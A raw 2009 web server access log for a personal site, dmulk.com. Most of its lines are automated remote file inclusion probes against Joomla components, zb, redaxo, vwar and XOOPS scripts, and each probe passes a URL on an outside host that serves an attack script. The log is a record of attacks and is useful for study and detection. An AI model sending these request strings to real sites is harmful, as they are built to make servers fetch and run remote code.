125.140.142.39 - - [21/Jun/2009:09:23:58 -0700] "GET /logs/access_080121.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:24:25 -0700] "GET /logs/access_071215.log////_head.php?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:24:27 -0700] "GET /logs////_head.php?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:24:27 -0700] "GET ///_head.php?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:23 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:23 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:23 -0700] "GET /logs/access_080512.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /logs/access_080512.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /logs/access_080512.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:25 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:26 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:30 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:26:31 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:27:15 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:27:15 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:27:15 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:28:23 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [21/Jun/2009:09:29:01 -0700] "GET //vwar/backup/errors.php?error=http://www.bestcursos.com.br/admin/w/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.55.106.115 - - [21/Jun/2009:09:29:06 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:29:51 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:29:51 -0700] "GET /logs/access_090120.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:29:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:30:11 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:32 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:34 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:34 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:30:36 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:30:45 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:30:46 -0700] "GET /include/admin.lib.inc.php?site_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:30:48 -0700] "GET /logs/access_080716.log/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:30:49 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:30:57 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:30:58 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:30:58 -0700] "GET /logs/access_090120.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:31:00 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:31:13 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20921 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:31:45 -0700] "GET /logs/access_090120.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:31:45 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:31:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:31:52 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:32:00 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20921 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:32:08 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.164.88.128 - - [21/Jun/2009:09:32:29 -0700] "GET /bikes/dteel/2009_06_20/IMG_6481s.JPG HTTP/1.1" 200 0 "http://www.st-owners.com/forums/showthread.php?t=42795&page=64" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.1)" "www.dmulk.com"
67.164.88.128 - - [21/Jun/2009:09:32:29 -0700] "GET /bikes/dteel/2009_06_20/IMG_6479s.JPG HTTP/1.1" 200 0 "http://www.st-owners.com/forums/showthread.php?t=42795&page=64" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.1)" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:32:46 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:33:46 -0700] "GET /logs/access_090120.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:33:50 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:33:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:33:51 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:34:19 -0700] "GET /logs/access_090120.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:34:33 -0700] "GET /logs/access_080311.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:34:35 -0700] "GET /logs/access_090327.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:34:35 -0700] "GET /logs/access_090113.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:34:56 -0700] "GET /logs/access_080311.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:35:43 -0700] "GET /logs/access_080506.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:36:39 -0700] "GET /logs/access_081205.log%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:36:39 -0700] "GET /logs/access_080124.log%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:36:49 -0700] "GET /logs/access_080124.log%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:36:49 -0700] "GET /logs/access_081205.log%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:37:22 -0700] "GET /logs/access_080723.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:38:05 -0700] "GET /logs/access_090120.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:39:11 -0700] "GET /logs/access_090328.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:39:12 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:09:39:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:39:19 -0700] "GET /logs/access_080503.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:39:29 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20911 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.78.238 - - [21/Jun/2009:09:40:17 -0700] "GET /bikes/dteel/2009_03_29/?N=D HTTP/1.0" 200 977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:40:23 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:40:57 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:40:57 -0700] "GET /logs/access_090328.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:40:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:01 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:01 -0700] "GET /logs/access_090328.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:41:03 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:03 -0700] "GET /logs/access_080503.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:11 -0700] "GET /logs/access_080503.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:13 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20911 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:41:17 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
206.53.153.148 - - [21/Jun/2009:09:41:18 -0700] "GET /bikes/dteel/2009_06_20/IMG_6481s.JPG HTTP/1.0" 200 254666 "http://www.st-owners.com/forums/showthread.php?p=752957" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
206.53.153.148 - - [21/Jun/2009:09:41:20 -0700] "GET /bikes/dteel/2009_06_20/IMG_6479s.JPG HTTP/1.0" 200 1537444 "http://www.st-owners.com/forums/showthread.php?p=752957" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:42:32 -0700] "GET /logs/access_090327.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:42:36 -0700] "GET /logs/access_090113.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:42:41 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:42:41 -0700] "GET /logs/access_090328.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:42:47 -0700] "GET /logs/access_090328.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:42:49 -0700] "GET /logs/access_080503.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.105.4.228 - - [21/Jun/2009:09:43:43 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://dmpacking.com/bbs/data/main/mawar.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:45:22 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:45:38 -0700] "GET /?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 21002 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:45:53 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:45:53 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:45:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:49:53 -0700] "GET /logs/access_090328.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:49:53 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:09:49:56 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:09:49:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:50:00 -0700] "GET /logs/access_080503.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:50:11 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.89 - - [21/Jun/2009:09:50:37 -0700] "GET //vwar/backup/errors.php?error=http://livrariacrescendonafe.com/admin/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:09:51:02 -0700] "GET /logs/access_081130.log%20%20//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:09:51:02 -0700] "GET /logs/access_090328.log%20%20//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:09:51:02 -0700] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:09:51:03 -0700] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
